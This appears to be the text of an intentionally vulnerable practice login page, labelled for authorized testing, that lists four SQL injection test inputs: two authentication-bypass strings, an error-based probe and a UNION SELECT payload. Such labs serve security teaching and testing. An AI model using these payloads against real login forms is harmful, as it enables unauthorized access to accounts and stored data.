⚠️ This application is INTENTIONALLY VULNERABLE. For authorized testing only.

🔐 Login Page (SQL Injection Vulnerable)

💡 SQL Injection Test Cases:

  1. Auth Bypass: Username: admin' OR '1'='1' -- Password: anything
  2. Auth Bypass 2: Username: ' OR 1=1 --
  3. Error Based: Username: admin'
  4. UNION: Username: ' UNION SELECT 1,'admin','pass',4,5,6,7 --